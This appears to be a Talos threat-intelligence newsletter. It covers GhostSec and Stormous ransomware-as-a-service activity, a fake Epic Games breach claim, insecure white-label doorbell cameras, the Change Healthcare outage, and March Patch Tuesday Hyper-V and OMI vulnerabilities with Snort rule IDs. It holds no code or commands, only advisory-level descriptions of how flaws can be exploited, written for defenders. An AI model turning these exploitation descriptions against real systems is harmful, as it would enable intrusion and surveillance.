It’s important to be vigilant about tax-related scams any time these deadlines roll around, regardless of what country you’re in, but it’s not like you need to be particularly more skeptical in March and April than any other time of the year. As soon as the tax filing deadline comes and goes, attackers will just start looking for the next hot topic to include in their phishing emails — presidential primaries, summer vacation deals or fake Amazon gift cards.
If you want to hear more about this, listen to the episode of Talos Takes on this topic from last year below.
The one big thing
An APT known as GhostSec has increased its ransomware activities over the past year and is now conducting “double extortion” ransomware attacks with fellow group Stormous. GhostSec and Stormous have also launched a new ransomware-as-a-service (RaaS) program STMX_GhostLocker and are actively recruiting new affiliates or members.
Why do I care?
Talos observed the GhostSec and Stormous ransomware groups operating together to conduct several double extortion attacks using the GhostLocker and StormousX ransomware programs against the victims in Cuba, Argentina, Poland, China, Lebanon, Israel, Egypt, Vietnam, Thailand and more nations, according to our assessment of the disclosure messages posted by the group in their Telegram channels and Stormous ransomware data leak site. This shows that the groups’ activities are not going to be contained just in one region or industry. RaaS has been a popular business model for many ransomware groups recently, which opens the door to other actors to use GhostSec’s tools by just paying them money.
So now what?
Talos has released new IOCs to provide defenders with new ways to block these ransomware actors. One of the implants GhostSec specifically relies on injects an admin bypass and hacking tool targeting the WordPress content management system. Any WordPress users should make sure their login credentials are up-to-date and strong and check their site to ensure there aren’t any illegitimate plugins or processes running on their site.
Top security headlines of the week
A fake ransomware gang calling itself “Mogilevich” admitted that they made up a claim that it had hacked video game developer Epic and stolen personal information and game source code. A leak page from the group claimed to have 200GB of data stolen from the company available for sale to other threat actors, or they would return the stolen information to Epic in exchange for a ransom payment. The group claimed it had "email, passwords, full name, payment information, source code and many other data." Epic immediately came forward sand said it had not detected any evidence of a hack or data breach. A few days after the claims went public, representatives from Mogilevich later came forward and called themselves “professional fraudsters” and they never hacked Epic’s network. Epic is known for the popular online platform and game “Fortnite.” The fraudsters also admitted that they had sold fake ransomware infrastructure to other would-be actors who wanted to carry out attacks themselves, including tricking one buyer out of $85,000. (Eurogamer, Cyber Daily)
A popular series of white-label security cameras are littered with an array of security vulnerabilities that could allow adversaries to collect images from their cameras without users knowing. The cameras are manufactured by the same company, but sold under the labels of Eken and Tuck on popular websites like Amazon, Walmart, Sears and Temu. The doorbells also do not have a visible ID issued by the Federal Communications Commission (FCC) that’s normally required by the agency, which technically makes them illegal to distribute in the U.S., though many of them were still for sale as of late February. The vulnerabilities affect more than 10 different products, which are all controlled by the same app that’s available on the Android app store. All an adversary would need to do to exploit the vulnerabilities and spy on the camera would be to acquire the serial number — no notification is sent to the doorbell’s owner when there’s a new pairing, and the adversary doesn’t even need an account username or password. Retailers that list the cameras for sale did not respond to a request for comment from Consumer Reports, the outlet that performed the research. (Consumer Reports, TechCrunch)
Payment systems across the U.S. health care system are offline, with many doctors having to switch to paper billing, after a massive data breach at Change Healthcare, a subsidiary of the UnitedHealth insurance company. Change Healthcare first disclosed the breach on Feb. 21 after adversaries disrupted operations for the company, which processes 15 billion health care-related transactions every year. Now the U.S. Department of Health and Human Services is urging health care systems and doctors who use Change to start developing alternatives, as they are unsure when systems will be back online. Change Healthcare is a system that connects doctors, hospitals and other health care providers with insurance companies to pay for medical care and authorize assorted services for patients. The follow-on effects have also been difficult on providers, who are now being faced with rent and other bills that they can’t pay because they still haven’t been paid by insurance companies. (USA Today, The New York Times)
This presentation from Chetan Raghuprasad details the Supershell C2 framework. Threat actors are using this framework massively and creating botnets with the Supershell implants.
Over the past year, we’ve observed a substantial uptick in attacks by YoroTrooper, a relatively nascent espionage-oriented threat actor operating against the Commonwealth of Independent Countries (CIS) since at least 2022. Asheer Malhotra's presentation at CARO 2024 will provide an overview of their various campaigns detailing the commodity and custom-built malware employed by the actor, their discovery and evolution in tactics. He will present a timeline of successful intrusions carried out by YoroTrooper targeting high-value individuals associated with CIS government agencies over the last two years.
For the second month in 2024, there are no actively exploited vulnerabilities included in this month’s security update from Microsoft.
March’s Patch Tuesday is relatively light, containing 60 vulnerabilities — only two labeled “critical.” Last month’s Patch Tuesday included more than 70 security vulnerabilities affecting Microsoft products, and there were even fewer in January and December, especially when compared to 2023.
Still, both critical vulnerabilities addressed this month are notable because they affect Windows Hyper-V, potentially allowing an adversary to target a host machine from a virtual machine environment.
All other vulnerabilities Microsoft disclosed Tuesday are considered to be of “important” severity.
CVE-2024-21408 is a denial-of-service vulnerability in Windows Hyper-V that could allow an adversary to target a host machine from inside a VM. However, Microsoft did not provide any additional details on how this denial-of-service could occur, and despite being listed as critical, it only scored a 5.5 out of 10 in the CVSS severity scoring system.
The other critical issue is CVE-2024-21407, a remote code execution also in Hyper-V. An attacker inside a VM environment could remotely execute code on the host machine by sending specially crafted file operation requests to hardware resources on the VM. However, the adversary would need to be authenticated inside the VM first and acquire certain, specific information about the environment to be gathered before a successful attack.
Another remote code execution vulnerability — of which there are 19 in Tuesday’s release, CVE-2024-21334, exists in Open Management Infrastructure. A remote, unauthenticated attacker could exploit this vulnerability by accessing the OMI instance from the internet and sending specially crafted requests to trigger a use-after-free vulnerability.
CVE-2024-21334 is only considered by Microsoft to be “important,” though it has a CVSS score of 9.8 out of 10 — the highest of any vulnerability disclosed as part of March’s Patch Tuesday that affects a Microsoft product.
A complete list of all the other vulnerabilities Microsoft disclosed this month is available on its update page.
In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Security Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
The rules included in this release that protect against the exploitation of many of these vulnerabilities are 63140, 63141, 63142, 63144, 63145, 63152, 63153, 63155, 63156, 63161, 63162 and 63169 - 63170. There are also Snort 3 rules 300855, 300856 and 300858 - 300860.